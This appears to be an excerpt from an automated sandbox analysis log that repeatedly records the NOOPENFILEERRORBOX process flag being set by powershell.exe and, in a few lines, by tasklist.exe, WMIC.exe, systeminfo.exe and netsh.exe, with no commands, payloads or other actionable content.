                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
